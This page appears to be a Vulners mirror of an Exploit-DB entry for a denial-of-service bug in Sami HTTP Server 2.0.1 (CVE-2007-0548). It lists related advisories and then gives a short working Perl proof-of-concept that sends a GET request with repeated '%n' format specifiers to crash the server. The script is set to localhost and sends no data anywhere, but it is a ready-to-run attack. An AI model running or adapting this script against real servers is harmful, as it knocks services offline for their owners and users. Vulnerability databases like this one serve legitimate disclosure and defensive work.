Lucene search
+L

Sami HTTP Server 2.0.1 - GET Denial of Service

🗓️ 05 Nov 2010 00:00:00Reported by wingthorType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 43 Views

Sami HTTP Server 2.0.1 - GET Denial of Service exploit targeting Windows XP SP

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2007-0548
5 Nov 201000:00
circl
checkpoint_advisories
Check Point Advisories
Sami HTTP Server GET Request Denial of Service - Ver2 (CVE-2007-0548)
26 Mar 201500:00
checkpoint_advisories
cve
CVE
CVE-2007-0548
29 Jan 200717:00
cve
cvelist
Cvelist
CVE-2007-0548
29 Jan 200717:00
cvelist
exploitdb
Exploit DB
Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service
23 Jan 200700:00
exploitdb
euvd
EUVD
EUVD-2007-0546
29 Jan 200717:00
euvd
nvd
NVD
CVE-2007-0548
29 Jan 200717:28
nvd
prion
Prion
Design/Logic Flaw
29 Jan 200717:28
prion
securityvulns
securityvulns
Sami HTTP Server DoS
31 Jan 200700:00
securityvulns
#!/usr/bin/perl
# Exploit Titel: Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
# Date: 25.10.10
# Tool: Sami HTTP Server -- Version: 2.0.1
# Vendor-Website: http://www.karjasoft.com/old.php
# Download Link: http://www.karjasoft.com/files/samihttp/samihttpd_install.exe
# Author: wingthor
# Author-Website (German): http://www.wingthor.de
# Author-Email: [email protected]
# Tested on: Windows XP SP3
# Type: DOS/POC


use IO::Socket;

$target = "127.0.0.1";
$port   = 80;

$payload = "GET /%n%n%n%n%n HTTP/1.1\r\n\r\n";

$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n";

$sock->send($payload);

close($sock);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25
EPSS0.03059
43